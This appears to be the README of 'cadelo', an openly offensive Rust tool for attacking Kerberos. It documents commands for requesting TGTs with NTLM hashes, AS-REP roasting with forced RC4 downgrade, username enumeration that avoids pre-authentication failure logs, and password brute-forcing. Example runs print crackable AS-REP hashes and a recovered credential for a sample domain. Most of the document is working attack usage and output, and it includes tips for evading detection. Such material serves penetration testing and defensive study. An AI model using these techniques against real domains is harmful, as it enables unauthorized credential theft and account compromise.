#user-password #kerberos #attack #protocols #cipher #user-name #interact

app cadelo

Tool to interact and attack the Kerberos protocol

1 unstable release

0.0.1 Jan 23, 2020

#11 in #user-password

AGPL-3.0

110KB
2.5K SLoC

cadelo

A tool to interact and attack the Kerberos protocol, based on the library kerbeiros.

Compatible with linux and windows.

Still in development...

To build

git clone https://gitlab.com/Zer1t0/cadelo
cd cadelo
cargo build --release
cd target/release/
./cadelo -h

AskTGT


Get a Kerberos TGT

Usage

$ ./cadelo asktgt -h
cadelo-asktgt 
Zer1t0
Get a Kerberos TGT

USAGE:
    cadelo asktgt [OPTIONS] --domain <domain> --username <username> <--password <password>|--ntlm <ntlm>|--aes-128 <aes-128>|--aes-256 <aes-256>>

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information

OPTIONS:
        --aes-128 <aes-128>                AES 128 Kerberos key of user
        --aes-256 <aes-256>                AES 256 Kerberos key of user
    -d, --domain <domain>                  Domain to brute-force
    -k, --kdc-ip <ip>                      The address of the KDC
        --ntlm <ntlm>                      NTLM hash of user
        --out-file <file>                  File to save TGT.
    -p, --password <password>              Password of user
        --ticket-format <ticket-format>    Format to save retrieved tickets. [default: ccache]  [possible values: krb,
                                           ccache]
    -u, --username <username>              Username what TGT is for

Examples

Requesting a TGT by using the NTLM hash of user password:

$ ./cadelo asktgt -d kingdom.hearts -u mickey --ntlm 7ED026C3D202555DB1F8A8BA91C67C27 --kdc-ip 10.0.0.1
[+] Saved TGT into mickey.ccache

ASREPRoast


Search for users without Kerberos pre-authentication, also enumerates usernames.

How it works

The command asreproast sends Kerberos AS-REQ requests in order to discover users that doesn't require Kerberos pre-authentication, what allows to get the AS-REP response from KDC server, which includes a part encrypted with a key derivated from user password. Then, the tool returns this encrypted part formatted to be cracked in John The Ripper or Hashcat.

Moreover, by default the client indicates to the server that ciphers AES-256, AES-128 and RC4 are allowed, so probably the response comes encrypted with AES-256, which is harder to crack. However, the option --cipher allows specify a cipher algorithm for publish to the server and force the response encrypted with a weaker cipher as RC4.

Finally, this tool also can be use to enumerate users since it retrieves if an user exists or not. In this case, the different with the brute command is that this method don't generates logs of type 4771-Kerberos pre-authentication failed, only logs of 4768-A Kerberos authentication ticket (TGT) was requested.

Generated logs

This tool generates the following log in a Windows Domain Controller:

Usage

$ ./cadelo asreproast -h
cadelo-asreproast 
AS-REP roast attack

USAGE:
    cadelo asreproast [FLAGS] [OPTIONS] --domain <domain> <--username <username>|--usernames <file>>

FLAGS:
    -h, --help       Prints help information
        --udp        Use of UDP instead of TCP
    -V, --version    Prints version information
    -v, --verbose    Verbose

OPTIONS:
        --cipher <cipher>                Encryption algorithm requested to server. [possible values: rc4, aes128,
                                         aes256]
        --crack-format <crack-format>    Format to save non preauth responses. [default: hashcat]  [possible values:
                                         hashcat, john]
    -d, --domain <domain>                Domain to brute-force
    -k, --kdc-ip <ip>                    The address of the KDC
        --out-file <file>                File to save discovered non preauth responses. It is in hashcat or john format.
    -t, --threads <threads>              Number of threads [default: 1]
    -u, --username <username>            User to check
        --usernames <file>               File with username per line

Example

Look for a list of users without Kerberos pre-authentication required:

$ ./cadelo asreproast -d kingdom.hearts --usernames users.txt  -vv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$3fd92aac4926f3d92db9b224ef5e8a41a26cf689f48e65b9894d488a4ab4652811bf19cde7327325db8c0d435798f6ebe6543c19e74b618cf55658b0edfdd4e3f1a6f518468473beae9fb15c73b8b14fe6dd36e42835347d80b5fe8c77f35a6c2f7e35e273946fa85737c892b8cace5932a521011aab536f37cecf3955a6968c4ca9e19fdbcf305f705ca8f5a181fcf495831ab3dadaaaf3ed77b6df27eec1e8cfa6deeb5b4a920817d5c82eceb64bacc0d7cee790c13e2cdc4022cd9f278b29e3636542d1b778dbb34e2f15c09a2b3827da79d3e3ebd327398c1267fe98094aad3a16d79aa2ab1edf9ccfaf4d35d43b3a70b82f2255c01235b296d2097b3387ecde662c3a7e2b33089bbc7726bf03e4a77384801fbb531643d9f6a227ee3d
[*] Valid xion

  == Execution summary == 

[+] 1 users without pre-auth required were discovered, good luck on crack

Brute


Utility to perform a bruteforce attack against the Kerberos protocol. Be careful, since user account can get blocked performing this attack.

How it works

The brute command combines the usernames and passwords provide and test all the possibilities.In this way, it is possible to test an unique password for several users, or many passwords for one user. In case a user password is discovered the generated TGT is also saved for future use (this can be disabled with --no-save-ticket flag). The discovered credentials can be saved in a file using the --output-passwords option.

Furthermore, by processing the Kerberos errors the tool informs if an username exists or not. In the same way, it also indicates if an user account is blocked or disabled.

Finally, in case an user without Kerberos pre-authentication required was discovered, the tool indicates this and returns the encrypted part of the AS-REP message in John the Ripper or Hashcat format to allow its future crack in order to obtain the user password. (It is also possible to save this results into a file by using the --output-non-preauth option).

Generated logs

This tool generates the following logs in a Windows Domain Controller:

Usage

$ ./cadelo brute -h
cadelo-brute 
Zer1t0
Bruteforce attack

USAGE:
    cadelo brute [FLAGS] [OPTIONS] --domain <domain> <--password <password>|--passwords <file>> <--username <username>|--usernames <file>>

FLAGS:
    -h, --help              Prints help information
        --no-save-ticket    Do saved the retrieved tickets
        --udp               Use of UDP instead of TCP
    -V, --version           Prints version information
    -v, --verbose           Verbose

OPTIONS:
        --crack-format <crack-format>      Format to save non preauth responses. [default: hashcat]  [possible values:
                                           hashcat, john]
    -d, --domain <domain>                  Domain to brute-force
    -k, --kdc-ip <ip>                      The address of the KDC
        --output-non-preauth <file>        File to save discovered non preauth responses. It is in hashcat or john
                                           format.
        --output-passwords <file>          File to save discovered user:password per line
    -p, --password <password>              Password to brute-force
        --passwords <file>                 File with password per line
    -t, --threads <threads>                Number of threads [default: 1]
        --ticket-format <ticket-format>    Format to save retrieved tickets. [default: ccache]  [possible values: krb,
                                           ccache]
    -u, --username <username>              Username to brute-force
        --usernames <file>                 File with username per line

Example

Brute-force with a list of usernames and passwords:

$ ./cadelo brute -d kingdom.hearts --usernames users.txt --passwords passwords.txt -vvv
[-] Invalid admin
[-] Invalid root
[*] Valid mickey
[-] Invalid bob
[*] Valid roxas : No Preauth
[*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$a96e2f5df8eac27e596c5719b9c8c8134ac1aaef136e2bb6f5c814b34924a625af8e1f5ad802e78d0731ab3c099ac79414c7d601a247920ecb614b45405364bf8a1cc2c7c93c8e075241aa1863976ac9b21de4c9170bffc1a438be99a328be42e2cf465a1e2c949ac716e48ddf151f40c3b452b7785287d7adfa2d96a7f8a1a1df4a1b1c6f98c64893f83864026ee3d134ed6781451dda226034d0b9659b21cb4327b3e51f6b714857a988a184783927a1ea518fe90cc4a11956df0c2d3ae946799196fcbb9e88b5cfcaa78ee04c54e1a14dcdde26465a4d5ee7c13cdc2271c9b81c0cb343d65b73bcae7c7e24bb7de9acbd1938811a913fd97a539195d397a78abe63e06c938401d186a4166d54f6a49b3e162551b7e17f31b3db3587fa76
[!] Blocked/Disabled xion
[+] STUPENDOUS mickey:Minnie1234
[+] Saved mickey ticket into mickey.ccache

  == Execution summary == 

[+] Great, 1 user passwords were discovered
[+] 1 users without pre-auth required were discovered, good luck on crack

Dependencies

~11MB
~189K SLoC